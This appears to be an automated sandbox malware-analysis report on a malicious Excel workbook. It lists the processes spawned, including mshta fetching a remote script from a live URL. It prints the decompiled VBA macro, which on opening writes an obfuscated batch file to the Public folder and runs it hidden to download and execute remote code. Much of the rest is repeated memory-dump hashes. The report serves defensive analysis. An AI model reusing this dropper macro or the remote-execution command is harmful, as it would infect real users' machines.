                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:2
                                        Start time:10:48:17
                                        Start date:16/08/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
                                        Imagebase:0x4a0b0000
                                        File size:345088 bytes
                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:4
                                        Start time:10:48:19
                                        Start date:16/08/2022
                                        Path:C:\Windows\System32\PING.EXE
                                        Wow64 process (32bit):false
                                        Commandline:ping -n 8 127.0.0.1
                                        Imagebase:0xff390000
                                        File size:16896 bytes
                                        MD5 hash:5FB30FE90736C7FC77DE637021B1CE7C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Target ID:5
                                        Start time:10:48:27
                                        Start date:16/08/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start /min taskkill /f /im WINWORD.EXE
                                        Imagebase:0x4a0b0000
                                        File size:345088 bytes
                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:6
                                        Start time:10:48:27
                                        Start date:16/08/2022
                                        Path:C:\Windows\System32\taskkill.exe
                                        Wow64 process (32bit):false
                                        Commandline:taskkill /f /im WINWORD.EXE
                                        Imagebase:0xff1d0000
                                        File size:112640 bytes
                                        MD5 hash:3722FA501DCB50AE42818F9034906891
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Target ID:8
                                        Start time:10:48:27
                                        Start date:16/08/2022
                                        Path:C:\Windows\System32\mshta.exe
                                        Wow64 process (32bit):false
                                        Commandline:mshta http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Imagebase:0x13fbb0000
                                        File size:13824 bytes
                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Call Graph

                                        • Entrypoint
                                        • Decryption Function
                                        • Executed
                                        • Not Executed
                                        • Show Help
                                        callgraph 9 Workbook_Open Environ:1

                                        Module: EstaPastaDeTrabalho

                                        Declaration
                                        LineContent
                                        1

                                        Attribute VB_Name = "EstaPastaDeTrabalho"

                                        2

                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                        3

                                        Attribute VB_GlobalNameSpace = False

                                        4

                                        Attribute VB_Creatable = False

                                        5

                                        Attribute VB_PredeclaredId = True

                                        6

                                        Attribute VB_Exposed = True

                                        7

                                        Attribute VB_TemplateDerived = False

                                        8

                                        Attribute VB_Customizable = True

                                        APIsMeta Information

                                        Environ

                                        Environ("Public") -> C:\Users\Public

                                        Open

                                        Open("C:\Users\Public\Outlook.bat")

                                        Shell$

                                        vbLf

                                        StringsDecrypted Strings
                                        "Public"
                                        "call getCmdPid.bat"
                                        "set PID=%errorlevel%"
                                        "call windowMode.bat -pid %PID% -mode hidden"
                                        "cd C:\Users\Public"
                                        "@echo off"
                                        "Set ao8=TSkEhx6qZpCHJMOGRvfbn4wQaPBANVXWz8jcIKrtlYymiod3L2sU7eF105gu9D"
                                        "cls"
                                        "%ao8:~35,1%%ao8:~43,1%%ao8:~46,1% /%ao8:~35,1% %ao8:~50,1%%ao8:~39,1%%ao8:~24,1%%ao8:~38,1%%ao8:~39,1% /%ao8:~43,1%%ao8:~44,1%%ao8:~20,1% %ao8:~39,1%%ao8:~24,1%%ao8:~50,1%%ao8:~2,1%%ao8:~2,1%%ao8:~44,1%%ao8:~40,1%%ao8:~40,1% /%ao8:~18,1% /%ao8:~44,1%%ao8:~43,1% %ao8:~31,1%%ao8:~36,1%%ao8:~28,1%%ao8:~31,1%%ao8:~14,1%%ao8:~16,1%%ao8:~61,1%.%ao8:~3,1%%ao8:~30,1%%ao8:~3,1% & %ao8:~43,1%%ao8:~50,1%%ao8:~4,1%%ao8:~39,1%%ao8:~24,1% %ao8:~4,1%%ao8:~39,1%%ao8:~39,1%%ao8:~9,1%://%ao8:~18,1%%ao8:~24,1%%ao8:~35,1%%ao8:~53,1%%ao8:~5,1%%ao8:~39,1%%ao8:~38,1%%ao8:~24,1%%ao8:~46,1%%ao8:~53,1%.%ao8:~35,1%%ao8:~45,1%%ao8:~43,1%.%ao8:~19,1%%ao8:~38,1%/%ao8:~22,1%%ao8:~9,1%-%ao8:~44,1%%ao8:~20,1%%ao8:~35,1%%ao8:~40,1%%ao8:~59,1%%ao8:~46,1%%ao8:~53,1%%ao8:~50,1%/%ao8:~35,1%%ao8:~53,1%%ao8:~38,1%%ao8:~39,1%%ao8:~44,1%%ao8:~18,1%%ao8:~44,1%%ao8:~35,1%%ao8:~24,1%%ao8:~39,1%%ao8:~53,1%%ao8:~50,1%/%ao8:~21,1%.%ao8:~39,1%%ao8:~5,1%%ao8:~39,1%"
                                        " </ul>"
                                        " </ul>"
                                        "cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit"
                                        LineInstructionMeta Information
                                        9

                                        Private Sub Workbook_Open()

                                        10

                                        Dim iStage as Integer

                                        executed
                                        11

                                        Dim iCounter as Integer

                                        12

                                        Dim iPage as Integer

                                        13

                                        Dim sFile as String

                                        14

                                        sFile = Environ("Public") & "\Outlook.bat"

                                        Environ("Public") -> C:\Users\Public

                                        executed
                                        16

                                        Close

                                        17

                                        Open sFile For Output As # 1

                                        Open("C:\Users\Public\Outlook.bat")

                                        executed
                                        18

                                        Print # 1, "call getCmdPid.bat"

                                        19

                                        Print # 1, "set PID=%errorlevel%"

                                        20

                                        Print # 1, "call windowMode.bat -pid %PID% -mode hidden"

                                        21

                                        Print # 1, "cd C:\Users\Public"

                                        22

                                        Print # 1, "@echo off"

                                        23

                                        Print # 1, "Set ao8=TSkEhx6qZpCHJMOGRvfbn4wQaPBANVXWz8jcIKrtlYymiod3L2sU7eF105gu9D"

                                        24

                                        Print # 1, "cls"

                                        25

                                        Print # 1, "%ao8:~35,1%%ao8:~43,1%%ao8:~46,1% /%ao8:~35,1% %ao8:~50,1%%ao8:~39,1%%ao8:~24,1%%ao8:~38,1%%ao8:~39,1% /%ao8:~43,1%%ao8:~44,1%%ao8:~20,1% %ao8:~39,1%%ao8:~24,1%%ao8:~50,1%%ao8:~2,1%%ao8:~2,1%%ao8:~44,1%%ao8:~40,1%%ao8:~40,1% /%ao8:~18,1% /%ao8:~44,1%%ao8:~43,1% %ao8:~31,1%%ao8:~36,1%%ao8:~28,1%%ao8:~31,1%%ao8:~14,1%%ao8:~16,1%%ao8:~61,1%.%ao8:~3,1%%ao8:~30,1%%ao8:~3,1% & %ao8:~43,1%%ao8:~50,1%%ao8:~4,1%%ao8:~39,1%%ao8:~24,1% %ao8:~4,1%%ao8:~39,1%%ao8:~39,1%%ao8:~9,1%://%ao8:~18,1%%ao8:~24,1%%ao8:~35,1%%ao8:~53,1%%ao8:~5,1%%ao8:~39,1%%ao8:~38,1%%ao8:~24,1%%ao8:~46,1%%ao8:~53,1%.%ao8:~35,1%%ao8:~45,1%%ao8:~43,1%.%ao8:~19,1%%ao8:~38,1%/%ao8:~22,1%%ao8:~9,1%-%ao8:~44,1%%ao8:~20,1%%ao8:~35,1%%ao8:~40,1%%ao8:~59,1%%ao8:~46,1%%ao8:~53,1%%ao8:~50,1%/%ao8:~35,1%%ao8:~53,1%%ao8:~38,1%%ao8:~39,1%%ao8:~44,1%%ao8:~18,1%%ao8:~44,1%%ao8:~35,1%%ao8:~24,1%%ao8:~39,1%%ao8:~53,1%%ao8:~50,1%/%ao8:~21,1%.%ao8:~39,1%%ao8:~5,1%%ao8:~39,1%"

                                        30

                                        For iCounter = 2 To iStage

                                        31

                                        Print # 1, " </ul>"

                                        32

                                        iStage = iStage - 1

                                        33

                                        Next iCounter

                                        33

                                        Shell$ "cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit" & vbLf, 0

                                        Shell$

                                        vbLf

                                        40

                                        Close

                                        43

                                        End Sub

                                        Module: Planilha1

                                        Declaration
                                        LineContent
                                        1

                                        Attribute VB_Name = "Planilha1"

                                        2

                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                        3

                                        Attribute VB_GlobalNameSpace = False

                                        4

                                        Attribute VB_Creatable = False

                                        5

                                        Attribute VB_PredeclaredId = True

                                        6

                                        Attribute VB_Exposed = True

                                        7

                                        Attribute VB_TemplateDerived = False

                                        8

                                        Attribute VB_Customizable = True

                                        Reset < >
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0260d994e2d58bb08fd63a99b72eccc9fec3ade3aca525471d2f0c5e2d6d1a18
                                          • Instruction ID: 8ffb84720944e6a38b486cf636dc8d23ad6c4682a4d0175a757f281d3dcad790
                                          • Opcode Fuzzy Hash: 0260d994e2d58bb08fd63a99b72eccc9fec3ade3aca525471d2f0c5e2d6d1a18
                                          • Instruction Fuzzy Hash: 10B2262872CE4D4FDB49DB2C9468A38B7D2FB9D342B5804EAE44AC7696DB20CCD1C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92084d11f0ad404c306976c16bd240389daa858fa30503e14f01cc370320c7a1
                                          • Instruction ID: 5c9540406ba5af3d39128d8ee5b159435997ff472959f30ebb08db867572c3f0
                                          • Opcode Fuzzy Hash: 92084d11f0ad404c306976c16bd240389daa858fa30503e14f01cc370320c7a1
                                          • Instruction Fuzzy Hash: F862D234A18E498FDB59DB6C8884B64BBE1FB5D341F2841EAD04ED3296DB30DDD18B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eacc1e2bf8f3cacf665d77e9d66de34a6584b3a3e0b159e128651881f52e01be
                                          • Instruction ID: bd92eb575e9e7ef57060e5d64a57fd749021a2d86e4b30a18b08e955fe947983
                                          • Opcode Fuzzy Hash: eacc1e2bf8f3cacf665d77e9d66de34a6584b3a3e0b159e128651881f52e01be
                                          • Instruction Fuzzy Hash: BB421834A2CF4C4FDB49DB6C9454678BBE2FB5E342F5804AAD48AC7392DA20DCD18791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 993fe321feead38942ebe28396fc189c4c3c8875313a2a98052430a1455d9cf9
                                          • Instruction ID: 5f0ffc32d93e59b918383516a45e9244e9f516e24997f3ae8620c33bfd8fc59d
                                          • Opcode Fuzzy Hash: 993fe321feead38942ebe28396fc189c4c3c8875313a2a98052430a1455d9cf9
                                          • Instruction Fuzzy Hash: EAF1D638718E0C4FDB58EB6CD468B35B3D1FB5C302B5841AAE44AC76A6DB24DCD18790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1186810782.000000000A180000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A180000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_a180000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bac057014923fb1b168b95f7e53a922d2bbc89847dd99393cfdd13920a0f42e4
                                          • Instruction ID: 3dd1f88c7047041272ba8d29ff6b94eebaef60b6d01cb5e751209dce652b0db9
                                          • Opcode Fuzzy Hash: bac057014923fb1b168b95f7e53a922d2bbc89847dd99393cfdd13920a0f42e4
                                          • Instruction Fuzzy Hash: B7D1F470B18E588FDBA9EB2C8848B64B7E2FB99340F1541AAD44DD3296DB30DCD18F40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68de4e9375209fb76225700a0004b0d2b24f4d8be4cf60f321315e0b3a9bd521
                                          • Instruction ID: 6a91a807388267f5e03f3eef5929e46606259879c982c50bc7fb33a3278eb5a9
                                          • Opcode Fuzzy Hash: 68de4e9375209fb76225700a0004b0d2b24f4d8be4cf60f321315e0b3a9bd521
                                          • Instruction Fuzzy Hash: 3EB1042462CE8C0FDB49E76C4459A31BBD1FB5D346B5844DAE84EC72E2DA24DCD28391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9323f487bcd521309a93088a3fbeab6e747b02efc89a980538d61f0148575c0f
                                          • Instruction ID: d4b7b165eed82d695bb885f0429b3817ed3ac0d16dad34c62a67daecb7fec0f5
                                          • Opcode Fuzzy Hash: 9323f487bcd521309a93088a3fbeab6e747b02efc89a980538d61f0148575c0f
                                          • Instruction Fuzzy Hash: 8AA1E42432CE4D0FDB59E73C8458A35B7C2EB9D38176944DAE44BC7296DA24DCD283D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52225e3a28240c47cf44831c8803ca56c7ee78ed05d24e70a90d23f5259fd5de
                                          • Instruction ID: c65aae0d3feea17dcade2d4f89e08f689a8801d822257180778db6199a371288
                                          • Opcode Fuzzy Hash: 52225e3a28240c47cf44831c8803ca56c7ee78ed05d24e70a90d23f5259fd5de
                                          • Instruction Fuzzy Hash: 3D51C324728D4D0FEB69E72C9468B35B3D2EB9C351B5844DAE44EC33A5DA24DCD287C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168963552.00000000031A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_31a0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba3c6453ff6b726a0b8e08169c1a5b5580b123dc47a69758a751fa637f00a57f
                                          • Instruction ID: aa01f3c985766613d10af372bac51812da35b5249cfeab1743cad4e4c4716f64
                                          • Opcode Fuzzy Hash: ba3c6453ff6b726a0b8e08169c1a5b5580b123dc47a69758a751fa637f00a57f
                                          • Instruction Fuzzy Hash: CB41F42871CDCC4FE759D37C5568B25A7C1EB8D286B6984EBD84BC7296D624CCE28380
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.976955792.0000000002DA0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_2da0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction ID: 7de38e2d8b43439a3e2c78d751c9fcff21463ecf0d0a6e4a3de8dbda867232d1
                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.976955792.0000000002DA0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_2da0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction ID: 7de38e2d8b43439a3e2c78d751c9fcff21463ecf0d0a6e4a3de8dbda867232d1
                                          • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.1026159814.0000000008B80000.00000010.00000800.00020000.00000000.sdmp, Offset: 08B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_8b80000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction ID: c1ffc941e1cd8f1cc6dc6e931cd05de503df01716bf4819f6ae434f34892fee0
                                          • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000003.1026159814.0000000008B80000.00000010.00000800.00020000.00000000.sdmp, Offset: 08B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_3_8b80000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction ID: c1ffc941e1cd8f1cc6dc6e931cd05de503df01716bf4819f6ae434f34892fee0
                                          • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                          • Opcode Fuzzy Hash: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1168063375.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2c40000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bd3f9d3f6249b0fd7697be971891f14a3e6bae51eb2f0782dc7984266a0ed62
